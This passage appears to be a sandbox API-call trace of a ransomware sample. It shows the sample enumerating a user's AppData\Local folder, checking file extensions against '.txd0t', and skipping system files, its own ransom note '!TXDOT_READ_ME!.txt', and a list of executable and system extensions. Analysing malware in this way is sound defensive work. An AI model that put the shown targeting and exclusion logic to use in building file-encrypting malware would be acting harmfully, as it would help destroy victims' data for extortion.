ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2130 [0072.125] StrCmpW (psz1=".", psz2=".") returned 0 [0072.125] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0072.125] StrCmpW (psz1="..", psz2=".") returned 1 [0072.125] StrCmpW (psz1="..", psz2="..") returned 0 [0072.125] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0072.125] StrCmpW (psz1="ActiveSync", psz2=".") returned 1 [0072.125] StrCmpW (psz1="ActiveSync", psz2="..") returned 1 [0072.125] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="ActiveSync", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync") returned="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync" [0072.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\system32\\") returned 0x0 [0072.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\system\\") returned 0x0 [0072.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\ActiveSync", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\ActiveSync" [0072.125] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610e02, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0072.125] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0072.125] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0072.125] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.125] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Adobe", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe" [0072.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0072.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.125] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Adobe", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\Adobe" [0072.126] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0072.126] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0072.126] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0072.126] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CEF", cAlternateFileName="")) returned 1 [0072.126] StrCmpW (psz1="CEF", psz2=".") returned 1 [0072.126] StrCmpW (psz1="CEF", psz2="..") returned 1 [0072.126] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="CEF", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\CEF") returned="C:\\Users\\FD1HVy\\AppData\\Local\\CEF" [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\system32\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\system\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\CEF", lpSrch="\\appdata\\local\\") returned="\\AppData\\Local\\CEF" [0072.126] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a165bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc46ec579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x476c0de7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0072.126] StrCmpW (psz1="Comms", psz2=".") returned 1 [0072.126] StrCmpW (psz1="Comms", psz2="..") returned 1 [0072.126] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.126] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Comms", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Comms") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Comms" [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\system32\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\system\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.126] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Local\\Comms", lpSrch="\\appdata\\roaming\\") returned 0x0 [0072.127] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc58b9bba, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ConnectedDevicesPlatform", cAlternateFileName="CONNEC~1")) returned 1 [0072.127] StrCmpW (psz1="ConnectedDevicesPlatform", psz2=".") returned 1 [0072.127] StrCmpW (psz1="ConnectedDevicesPlatform", psz2="..") returned 1 [0072.127] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.127] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.127] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="ConnectedDevicesPlatform", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform") returned="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform" [0072.127] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4a3bd622, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x7e3bdb64, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0072.127] StrCmpW (psz1="Google", psz2=".") returned 1 [0072.127] StrCmpW (psz1="Google", psz2="..") returned 1 [0072.127] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.127] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.127] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Google", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Google") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Google" [0072.127] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0072.127] StrCmpW (psz1="History", psz2=".") returned 1 [0072.127] StrCmpW (psz1="History", psz2="..") returned 1 [0072.127] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd2e85042, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x13441, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0072.127] StrCmpW (psz1="IconCache.db", psz2=".") returned 1 [0072.127] StrCmpW (psz1="IconCache.db", psz2="..") returned 1 [0072.127] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.127] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.127] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="IconCache.db", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db") returned="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" [0072.127] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0072.128] StrCmpW (psz1=".db", psz2=".txd0t") returned -1 [0072.128] StrCmpIW (psz1="IconCache.db", psz2="bootsect.bak") returned 1 [0072.128] StrCmpIW (psz1="IconCache.db", psz2="iconcache.db") returned 0 [0072.128] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xeff5a990, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xeff5a990, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0072.128] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0072.128] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0072.128] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Microsoft", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft" [0072.128] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc895324f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd6772beb, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0072.128] StrCmpW (psz1="MicrosoftEdge", psz2=".") returned 1 [0072.128] StrCmpW (psz1="MicrosoftEdge", psz2="..") returned 1 [0072.128] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="MicrosoftEdge", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge") returned="C:\\Users\\FD1HVy\\AppData\\Local\\MicrosoftEdge" [0072.128] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa9067e6, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfa9067e6, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x190eac40, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0072.128] StrCmpW (psz1="Mozilla", psz2=".") returned 1 [0072.128] StrCmpW (psz1="Mozilla", psz2="..") returned 1 [0072.128] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Mozilla", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Mozilla" [0072.128] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43087f08, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xfe87ff8e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfe87ff8e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0072.128] StrCmpW (psz1="Packages", psz2=".") returned 1 [0072.128] StrCmpW (psz1="Packages", psz2="..") returned 1 [0072.128] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.128] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Packages", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages" [0072.128] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0072.128] StrCmpW (psz1="PeerDistRepub", psz2=".") returned 1 [0072.129] StrCmpW (psz1="PeerDistRepub", psz2="..") returned 1 [0072.129] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="PeerDistRepub", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub") returned="C:\\Users\\FD1HVy\\AppData\\Local\\PeerDistRepub" [0072.129] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e09841, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2f421af, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e09841, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0072.129] StrCmpW (psz1="Publishers", psz2=".") returned 1 [0072.129] StrCmpW (psz1="Publishers", psz2="..") returned 1 [0072.129] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Publishers", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Publishers" [0072.129] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x1db5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Resmon.ResmonCfg", cAlternateFileName="RESMON~1.RES")) returned 1 [0072.129] StrCmpW (psz1="Resmon.ResmonCfg", psz2=".") returned 1 [0072.129] StrCmpW (psz1="Resmon.ResmonCfg", psz2="..") returned 1 [0072.129] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Local", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0072.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0072.129] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\", psz2="Resmon.ResmonCfg", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" [0072.129] PathFindExtensionW (pszPath="Resmon.ResmonCfg") returned=".ResmonCfg" [0072.129] StrCmpW (psz1=".ResmonCfg", psz2=".txd0t") returned -1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="bootsect.bak") returned 1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="iconcache.db") returned 1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="thumbs.db") returned -1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2=" ransomware ") returned 1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2=" ransom ") returned 1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="debug.txt") returned 1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="boot.ini") returned 1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="desktop.ini") returned 1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="autorun.inf") returned 1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="ntuser.dat") returned 1 [0072.129] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="ntldr") returned 1 [0072.130] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="ntdetect.com") returned 1 [0072.130] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="bootfont.bin") returned 1 [0072.130] StrCmpIW (psz1="Resmon.ResmonCfg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.130] PathFindExtensionW (pszPath="Resmon.ResmonCfg") returned=".ResmonCfg" [0072.130] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ResmonCfg") returned 0x0 [0072.130] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.130] SystemTimeToTzSpecificLocalTime (in: 